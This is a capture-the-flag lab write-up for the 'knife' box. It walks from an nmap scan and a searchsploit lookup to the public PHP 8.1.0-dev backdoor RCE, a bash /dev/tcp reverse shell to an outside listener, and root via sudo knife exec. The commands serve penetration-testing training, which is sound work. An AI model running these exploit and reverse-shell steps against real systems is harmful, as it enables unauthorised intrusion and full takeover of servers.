Recon
Nmap scan
With nmap we found two open ports: a web server and an SSH server.
```text
# basic scan
nmap -A -sV -Pn 10.10.10.40
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Vulnerabilities
Thanks to Wappalyzer, we found the versions of Apache and PHP in use.
We search for known vulnerabilities in Exploit-DB.
```text
./searchsploit apache 2.4.41 # nothing
./searchsploit php 8.1.0
# PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
# PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode) | php/webapps/14320.pl
# PHP-Nuke 8.1.0.3.5b - 'Downloads' Blind SQL Injection | php/webapps/18148.pl
# PHP-Nuke 8.1.0.3.5b - Remote Command Execution | php/webapps/14319.pl
```
We find a known RCE for that PHP version. Let's try to exploit this vulnerability.
Exploit
Entry point
We try the first script found with searchsploit.
```text
# PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
python3 exploitdb/exploits/php/webapps/49933.py
Enter the full host url:
http://10.10.10.242/icons/
$ whoami
james
```
We got our first shell: we are connected to the server as the james user. We then upgrade it to a clean reverse shell.
```bash
# on host
nc -lvnp 4444
# on target
bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"
```
We can get the first user flag.
Privesc
First, I check whether there are any commands that the user james can run with sudo rights.
```text
# list commands that james can run with sudo
sudo -l
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
```
We can see here that james can run the knife command with root permissions without entering any password. Let's check which options knife accepts; maybe one of its sub-commands lets us run arbitrary commands.
```text
knife --help
** EXEC COMMANDS **
knife exec [SCRIPT] (options)
```
Bingo! After some digging through the help output I found the sub-command exec, which lets us execute commands. Let's try to pop a root shell!
```text
sudo -u root knife exec '/bin/bash'
ERROR: SyntaxError: /bin/bash: Invalid char `\x7F' in expression
/bin/bash: Invalid char `\x02' in expression
/bin/bash: Invalid char `\x01' in expression
/bin/bash: Invalid char `\x01' in expression
```
I first get an error: knife exec treats its argument as the path of a Ruby script, so it tried to parse the /bin/bash binary as Ruby and choked on the non-printable characters. I then found the -E option, which makes the exec sub-command evaluate the Ruby code passed on the command line.
```text
# lets try -E option to pass command
sudo -u root knife exec -E 'exec "/bin/bash"'
whoami
root
```
We are root! We can get the flag and close the box!
PHP, Backdoor, Easy, External, Apache, Penetration Tester Level 1, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Sudo Exploitation, Enumeration